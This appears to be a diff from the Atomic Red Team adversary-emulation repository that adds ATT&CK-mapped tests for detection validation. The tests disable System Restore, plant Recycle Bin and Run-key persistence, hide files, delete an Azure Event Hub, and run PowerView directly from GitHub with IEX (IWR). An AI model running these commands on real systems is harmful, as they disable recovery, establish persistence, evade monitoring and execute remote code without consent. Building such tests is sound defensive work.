+      New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true" -OutFile "#{arbitrary_dll}"
+  executor:
+    command: |
+      wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer
+    cleanup_command: |-
+      taskkill /f /im calculator.exe > nul 2>&1
+    name: command_prompt 

atomics/T1490/T1490.md

@@ -27,6 +27,8 @@ A number of native Windows utilities have been used by adversaries to disable or
 
 - [Atomic Test #8 - Windows - Disable the SR scheduled task](#atomic-test-8---windows---disable-the-sr-scheduled-task)
 
+- [Atomic Test #9 - Disable System Restore Through Registry](#atomic-test-9---disable-system-restore-through-registry)
+
 
 <br/>
 
@@ -285,4 +287,43 @@ schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - Disable System Restore Through Registry
+Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. 
+See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 66e647d1-8741-4e43-b7c1-334760c2047f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
+```
+
+
+
+
+
 <br/>

atomics/T1490/T1490.yaml

@@ -115,3 +115,23 @@ atomic_tests:
       schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
     name: command_prompt
     elevation_required: true
+- name: Disable System Restore Through Registry
+  auto_generated_guid: 66e647d1-8741-4e43-b7c1-334760c2047f
+  description: |
+    Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. 
+    See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f
+      reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f
+    cleanup_command: |
+      reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

atomics/T1547.001/T1547.001.md

@@ -56,6 +56,10 @@ Adversaries can use these configuration locations to execute malware, such as re
 
 - [Atomic Test #7 - Add Executable Shortcut Link to User Startup Folder](#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder)
 
+- [Atomic Test #8 - Add persistance via Recycle bin](#atomic-test-8---add-persistance-via-recycle-bin)
+
+- [Atomic Test #9 - SystemBC Malware-as-a-Service Registry](#atomic-test-9---systembc-malware-as-a-service-registry)
+
 
 <br/>
 
@@ -326,4 +330,77 @@ Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Add persistance via Recycle bin
+Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+User have to clic on the recycle bin to lauch the payload (here calc)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** bda6a3d6-7aa7-4e89-908b-306772e9662f
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #9 - SystemBC Malware-as-a-Service Registry
+This Atomic will create a registry key called socks5_powershell for persistance access
+https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9dc7767b-30c1-4cc4-b999-50cab5e27891
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| reg_key_value | Thing to Run | Path | powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File|
+| reg_key_path | Path to registry key to update | Path | HKCU:&#92;Software&#92;Microsoft&#92;Windows&#92;CurrentVersion&#92;Run|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$RunKey = "#{reg_key_path}"
+Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1547.001/T1547.001.yaml

@@ -139,3 +139,40 @@ atomic_tests:
     cleanup_command: Remove-Item "$home\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\calc_exe.lnk" -ErrorAction Ignore
     name: powershell
     elevation_required: true 
+
+- name: Add persistance via Recycle bin
+  auto_generated_guid: bda6a3d6-7aa7-4e89-908b-306772e9662f
+  description: |
+    Add a persistance via Recycle bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
+    User have to clic on the recycle bin to lauch the payload (here calc)
+  supported_platforms:
+  - windows
+  executor:
+    command: reg ADD "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open\command" /ve /d "calc.exe" /f  
+    cleanup_command: reg DELETE "HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell\open" /f
+    name: command_prompt
+
+- name: SystemBC Malware-as-a-Service Registry
+  auto_generated_guid: 9dc7767b-30c1-4cc4-b999-50cab5e27891
+  description: |
+      This Atomic will create a registry key called socks5_powershell for persistance access
+      https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
+  supported_platforms:
+  - windows
+  input_arguments:
+    reg_key_value:
+      description: Thing to Run
+      type: Path
+      default: powershell.exe -windowstyle hidden -ExecutionPolicy Bypass -File
+    reg_key_path:
+      description: Path to registry key to update
+      type: Path
+      default: HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
+  executor:
+    command: |
+      $RunKey = "#{reg_key_path}"
+      Set-ItemProperty -Path $RunKey -Name "socks5_powershell" -Value "#{reg_key_value}"
+    cleanup_command: |
+      Remove-ItemProperty -Path #{reg_key_path} -Name "socks5_powershell" -Force -ErrorAction Ignore
+    name: powershell
+    

atomics/T1547/T1547.md

@@ -0,0 +1,44 @@
+# T1547 - Boot or Logon Autostart Execution
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547)
+<blockquote>Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
+
+Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges.</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Add a driver](#atomic-test-1---add-a-driver)
+
+
+<br/>
+
+## Atomic Test #1 - Add a driver
+Install a driver via pnputil.exe lolbin
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** cb01b3da-b0e7-4e24-bf6d-de5223526785
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| driver_inf | A built-in, already installed windows driver inf | Path | C:&#92;Windows&#92;INF&#92;usbstor.inf|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+pnputil.exe /add-driver "#{driver_inf}"
+```
+
+
+
+
+
+
+<br/>

atomics/T1547/T1547.yaml

@@ -0,0 +1,18 @@
+attack_technique: T1547
+display_name: 'Boot or Logon Autostart Execution'
+atomic_tests:
+- name: Add a driver
+  auto_generated_guid: cb01b3da-b0e7-4e24-bf6d-de5223526785
+  description: |
+    Install a driver via pnputil.exe lolbin
+  supported_platforms:
+  - windows
+  input_arguments:
+    driver_inf:
+      description: A built-in, already installed windows driver inf
+      type: Path    
+      default: 'C:\Windows\INF\usbstor.inf'
+  executor:
+    command: |
+      pnputil.exe /add-driver "#{driver_inf}"
+    name: command_prompt

atomics/T1558.004/T1558.004.md

@@ -14,6 +14,8 @@ Cracked hashes may enable [Persistence](https://attack.mitre.org/tactics/TA0003)
 
 - [Atomic Test #1 - Rubeus asreproast](#atomic-test-1---rubeus-asreproast)
 
+- [Atomic Test #2 - Get-DomainUser with PowerView](#atomic-test-2---get-domainuser-with-powerview)
+
 
 <br/>
 
@@ -76,4 +78,33 @@ Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Get-DomainUser with PowerView
+Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** d6139549-7b72-4e48-9ea1-324fc9bdf88a
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+```
+
+
+
+
+
+
 <br/>

atomics/T1558.004/T1558.004.yaml

@@ -46,3 +46,14 @@ atomic_tests:
       Remove-Item #{local_folder}\#{out_file} -ErrorAction Ignore
     name: powershell
     elevation_required: false
+- name: Get-DomainUser with PowerView
+  auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
+  description: |
+    Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
+    name: powershell

atomics/T1562.001/T1562.001.yaml

@@ -573,4 +573,4 @@ atomic_tests:
     cleanup_command: |
       cmd /c #{DefenderControlExe} /E | Out-Null
     name: powershell
-    elevation_required: true  
+    elevation_required: true

atomics/T1562.008/T1562.008.md

@@ -8,6 +8,8 @@ Cloud environments allow for collection and analysis of audit and application lo
 
 - [Atomic Test #1 - AWS CloudTrail Changes](#atomic-test-1---aws-cloudtrail-changes)
 
+- [Atomic Test #2 - Azure - Eventhub Deletion](#atomic-test-2---azure---eventhub-deletion)
+
 
 <br/>
 
@@ -64,4 +66,60 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure - Eventhub Deletion
+Identifies an Event Hub deletion in Azure.
+An Event Hub is an event processing service that ingests and processes large volumes of events and data.
+An adversary may delete an Event Hub in an attempt to evade detection.
+https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 5e09bed0-7d33-453b-9bf3-caea32bff719
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure username | String | |
+| password | Azure password | String | |
+| event_hub_name | Name of the eventhub | String | test_eventhub|
+| resource_group | Name of the resource group | String | |
+| name_space_name | Name of the NameSpace | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-AzureAD -Credential $creds
+New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
+Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Install-Module -Name Az
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+
+
+
 <br/>

atomics/T1562.008/T1562.008.yaml

@@ -39,6 +39,53 @@ atomic_tests:
        aws s3 rb s3://#{s3_bucket_name} --force 
     name: sh
     elevation_required: false
+- name: Azure - Eventhub Deletion
+  auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
+  description: |
+    Identifies an Event Hub deletion in Azure.
+    An Event Hub is an event processing service that ingests and processes large volumes of events and data.
+    An adversary may delete an Event Hub in an attempt to evade detection.
+    https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    username:
+      description: Azure username
+      type: String
+      default: null
+    password:
+      description: Azure password
+      type: String
+      default: null
+    event_hub_name:
+      description: Name of the eventhub
+      type: String
+      default: "test_eventhub"
+    resource_group:
+      description: Name of the resource group
+      type: String
+      default: null
+    name_space_name:
+      description: Name of the NameSpace
+      type: String
+      default: null
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Install-Module -Name Az
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-AzureAD -Credential $creds
+      New-AzEventHub -ResourceGroupName #{resource_group} -NamespaceName #{name_space_name} -Name #{event_hub_name}
+      Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
+    name: powershell
+    elevation_required: false
 - name: Office 365 - Exchange Audit Log Disabled
   auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c
   description: |
@@ -79,4 +126,4 @@ atomic_tests:
       Connect-ExchangeOnline -Credential $creds
       Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True
     name: powershell
-    elevation_required: false
+    elevation_required: false

atomics/T1564.001/T1564.001.md

@@ -24,6 +24,8 @@ Adversaries can use this to their advantage to hide files and folders anywhere o
 
 - [Atomic Test #7 - Show all hidden files](#atomic-test-7---show-all-hidden-files)
 
+- [Atomic Test #8 - Hide Files Through Registry](#atomic-test-8---hide-files-through-registry)
+
 
 <br/>
 
@@ -283,4 +285,39 @@ defaults write com.apple.finder AppleShowAllFiles NO
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - Hide Files Through Registry
+Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user.
+See how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f650456b-bd49-4bc1-ae9d-271b5b9581e7
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1
+reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1
+```
+
+
+
+
+
 <br/>

atomics/T1564.001/T1564.001.yaml

@@ -119,3 +119,19 @@ atomic_tests:
     cleanup_command: |
       defaults write com.apple.finder AppleShowAllFiles NO
     name: sh
+- name: Hide Files Through Registry
+  auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7
+  description: |
+    Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user.
+    See how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx 
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f
+      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f
+    cleanup_command: |
+      reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1
+      reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1
+    name: command_prompt
+    elevation_required: true

atomics/used_guids.txt

@@ -880,3 +880,57 @@ c59f246a-34f8-4e4d-9276-c295ef9ba0dd
 12631354-fdbc-4164-92be-402527e748da
 5fc528dd-79de-47f5-8188-25572b7fafe0
 e895677d-4f06-49ab-91b6-ae3742d0a2ba
+35eb8d16-9820-4423-a2a1-90c4f5edd9ca
+6b2903ac-8f36-450d-9ad5-b220e8a2dcb9
+0b79c06f-c788-44a2-8630-d69051f1123d
+a27418de-bdce-4ebd-b655-38f04842bf0c
+64ede6ac-b57a-41c2-a7d1-32c6cd35397d
+9f4e344b-8434-41b3-85b1-d38f29d148d0
+43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8
+46352f40-f283-4fe5-b56d-d9a71750e145
+02e8be5a-3065-4e54-8cc8-a14d138834d3
+d6139549-7b72-4e48-9ea1-324fc9bdf88a
+97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+b9d2e8ca-5520-4737-8076-4f08913da2c4
+e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+5a8a181c-2c8e-478d-a943-549305a01230
+93662494-5ed7-4454-a04c-8c8372808ac2
+3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+b2698b33-984c-4a1c-93bb-e4ba72a0babb
+cb01b3da-b0e7-4e24-bf6d-de5223526785
+bda6a3d6-7aa7-4e89-908b-306772e9662f
+ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8
+d2561a6d-72bd-408c-b150-13efe1801c2a
+af254e70-dd0e-4de6-9afe-a994d9ea8b62
+c0d6d67f-1f63-42cc-95c0-5fd6b20082ad
+6e0d1131-2d7e-4905-8ca5-d6172f05d03d
+e246578a-c24d-46a7-9237-0213ff86fb0c
+d4a6da40-618f-454d-9a9e-26af552aaeb0
+3dacb0d2-46ee-4c27-ac1b-f9886bf91a56
+3b3809b6-a54b-4f5b-8aff-cb51f2e97b34
+b51239b4-0129-474f-a2b4-70f855b9f2c2
+640cbf6d-659b-498b-ba53-f6dd1a1cc02c
+5e09bed0-7d33-453b-9bf3-caea32bff719
+c6c34f61-1c3e-40fb-8a58-d017d88286d8
+93386d41-525c-4a1b-8235-134a628dee17
+d49ff3cc-8168-4123-b5b3-f057d9abbd55
+ffbb407e-7f1d-4c95-b22e-548169db1fbd
+a450e469-ba54-4de1-9deb-9023a6111690
+5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4
+12f50e15-dbc6-478b-a801-a746e8ba1723
+d29b7faf-7355-4036-9ed3-719bd17951ed
+4d72d4b1-fa7b-4374-b423-0fe326da49d2
+20fc9daa-bd48-4325-9aff-81b967a84b1d
+8023db1e-ad06-4966-934b-b6a0ae52689e
+a4637291-40b1-4a96-8c82-b28f1d73e54e
+3e757ce7-eca0-411a-9583-1c33b8508d52
+8d85a5d8-702f-436f-bc78-fcd9119496fc
+7f037590-b4c6-4f13-b3cc-e424c5ab8ade
+9dc7767b-30c1-4cc4-b999-50cab5e27891
+94ea9cc3-81f9-4111-8dde-3fb54f36af4b
+f650456b-bd49-4bc1-ae9d-271b5b9581e7
+66e647d1-8741-4e43-b7c1-334760c2047f
+795d3248-0394-4d4d-8e86-4e8df2a2693f
+95b25212-91a7-42ff-9613-124aca6845a8
+49fbd548-49e9-4bb7-94a6-3769613912b8